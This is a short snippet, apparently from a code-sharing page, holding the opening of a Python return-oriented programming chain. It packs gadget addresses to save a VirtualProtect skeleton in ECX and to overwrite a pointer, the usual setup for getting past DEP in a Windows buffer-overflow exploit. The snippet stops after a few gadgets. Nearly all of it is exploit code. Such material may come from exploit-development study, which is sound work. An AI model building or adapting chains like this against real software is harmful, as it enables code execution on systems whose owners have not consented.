This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| rop = b'' | |
| # 0. preserve location of VirtualProtect skeleton in ECX | |
| rop += struct.pack('<L', 0x625021ff) # nop ; mov ecx, eax ; mov eax, ecx ; pop ebx ; pop esi ; ret | |
| rop += struct.pack('<L', 0x41414141) # junk for ebx | |
| rop += struct.pack('<L', 0x41414141) # junk for esi | |
| # 1. override pointers with gadgets | |
| # override 0x625070DC to hold address of pop r32 ; ret gadget | |
| rop += struct.pack('<L', 0x625014fc) # pop ebx ; ret | |
| rop += struct.pack('<L', 0x625070DC) # ebx will be 0x625070DC |